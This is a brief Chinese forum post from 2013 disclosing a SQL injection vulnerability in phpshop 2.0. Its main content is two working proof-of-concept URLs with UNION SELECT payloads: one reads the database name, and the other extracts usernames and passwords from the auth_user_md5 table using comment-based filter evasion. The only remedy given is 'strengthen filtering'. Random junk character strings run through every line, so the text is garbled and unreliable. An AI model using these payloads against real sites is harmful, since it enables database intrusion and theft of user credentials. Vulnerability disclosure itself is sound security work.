标题 : phpshop 2.0 SQL Injection Vulnerability4 o* L8 N8 O9 p: s
0 B! E: x5 M& ~, M5 v7 G
作者 : By onestree% F" f1 H5 P v5 E0 v
下载地址 : http://code.google.com/p/phpshop/downloads/list
, t2 c3 g- D$ j( o }测试地址: windows 7 / ubuntu' R' i$ R) S$ |
" ]( f" {/ S- j% c1 K' b7 l$ z 5 R; ^6 T( n& Z h' D0 I
SQLi p0c:
: q. L w/ e) \ / F# l, W. _& o7 y. Y$ Z! a
==================; f7 G) A0 i) Q! z7 }
: J! f3 W$ A0 R: I" |0 ?5 l; I
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
7 F% c% X F4 }* y+ R5 O& o8 g# q' Dunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --0 ~& |: t. ^' V& L; n* r5 x3 ]
1 Y: ^. C5 z o5 v* M
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
2 o( g$ X2 d( K1 a; ^8 t) q
. \* C- J5 E7 Y F修复:; f$ Z1 Z( l" g2 k6 i1 W4 a
加强过滤
6 z3 J! n$ k( s) f
9 d& P# f6 d9 |2 k
# U% f$ {$ g" K9 p |
发表于 2013-1-18 18:24:10
收藏
支持
反对